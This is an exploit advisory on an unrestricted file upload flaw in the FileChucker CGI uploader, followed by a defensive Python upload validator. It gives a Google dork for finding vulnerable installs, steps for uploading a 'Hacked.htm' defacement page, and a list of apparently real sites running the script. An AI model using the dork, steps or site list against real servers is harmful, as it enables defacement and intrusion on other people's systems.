FileChucker File Upload Vulnerability

2013.06.30
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#######################################################
#
# [+] Exploit Title: FileChucker File Upload Vulnerability
# [+] Google Dork: inurl:/cgi-bin/filechucker.cgi OR "intext:File Upload by Encodable" OR inurl:/cgi-bin/filechucker.pl
# [+] Date: 28-06-2013
# [+] Exploit Author: Iranian_Dark_Coders_Team
# [+] Home : www.idc-team.net
# [+] Category: webapps
# [+] Software Link: http://encodable.com/filechucker/trial/filechucker.zip
# [+] Vendor Homepage: http://encodable.com/filechucker/
# [+] Tested on: Windows 7
#
#######################################################
#
# [+] Exploit:
#
# [+] http://localhost/[path]/cgi-bin/filechucker.cgi
# [+] http://localhost/[path]/cgi-bin/filechucker.pl
#
#
#######################################################
#
# [+] Proof:
#
# [+] http://localhost/[path]/cgi-bin/filechucker.cgi
# [1] You must enter the requested information first.
# [2] Please Click on the Browse and Select a file ( .htm , .html , .gif , .jpg , .png , .txt )
# [3] http://localhost/[path]/upload/files/Hacked.htm OR Hacked.html
#
#######################################################
#
# [+] Demo site:
#
# [+] http://www.artcoloXrcv.com.br/cgi-bin/filechucker.cgi
# [+] http://toptowXn.co.uk/cgi-bin/filechucker.cgi
# [+] http://www.npXnweb.org/cgi-bin/filechucker.cgi
#
#######################################################
#
# [+] Discovered By : Black.Hack3r
# [+] We Are : M.R.S.CO,Black.Hack3r,N3O,UB313
# [+] Home : http://www.idc-team.net
#
#######################################################

References:

http://www.idc-team.net
http://encodable.com/filechucker/trial/filechucker.zip
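
A server-side check that would refuse the upload described in the Proof steps, as an added example (not FileChucker's code and not from the advisory's author): it drops .htm/.html from the accepted extensions and verifies that the content matches the extension. The function name `check_upload`, the hardened allowlist and the sample inputs are assumptions constructed for illustration.

```python
# Extensions the advisory lists as accepted by the upload form.
ADVISORY_ALLOWED = {".htm", ".html", ".gif", ".jpg", ".png", ".txt"}
# Assumption: a hardened allowlist drops the types a browser renders as a page.
HARDENED_ALLOWED = ADVISORY_ALLOWED - {".htm", ".html"}

# Leading bytes expected for each image type.
MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".jpg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
}
# Markup that should never appear at the start of an image or plain-text upload.
HTML_MARKERS = (b"<html", b"<script", b"<!doctype", b"<iframe", b"<body", b"<svg")


def check_upload(filename, head):
    """Return (accepted, reason) for a client-supplied name and the file's first bytes."""
    # Reject path components, hidden files and multi-extension names outright.
    if "/" in filename or "\\" in filename:
        return False, "unsafe file name"
    parts = filename.lower().split(".")
    if len(parts) != 2 or not parts[0] or not parts[1]:
        return False, "unsafe file name"
    ext = "." + parts[1]
    if ext not in HARDENED_ALLOWED:
        return False, "extension not allowed"
    # An image extension must be backed by the matching file signature.
    if ext in MAGIC and not head.startswith(MAGIC[ext]):
        return False, "content does not match extension"
    # Catch markup smuggled into a .txt file or an image header.
    if any(marker in head[:1024].lower() for marker in HTML_MARKERS):
        return False, "markup in content"
    return True, "ok"


def demo():
    """Run the check over constructed sample uploads (not real captured data)."""
    samples = [
        ("Hacked.htm", b"<html><body>constructed sample</body></html>"),
        ("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
        ("photo.png", b"<html>constructed sample</html>"),
        ("notes.txt", b"<SCRIPT>constructed sample</SCRIPT>"),
        ("page.html.txt", b"plain text"),
    ]
    return [(name, *check_upload(name, head)) for name, head in samples]


if __name__ == "__main__":
    for row in demo():
        print(row)
```

Serving the upload directory with `X-Content-Type-Options: nosniff` and `Content-Disposition: attachment` keeps a file that slips past the check from rendering in the site's origin.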



Copyright 2024, cxsecurity.com
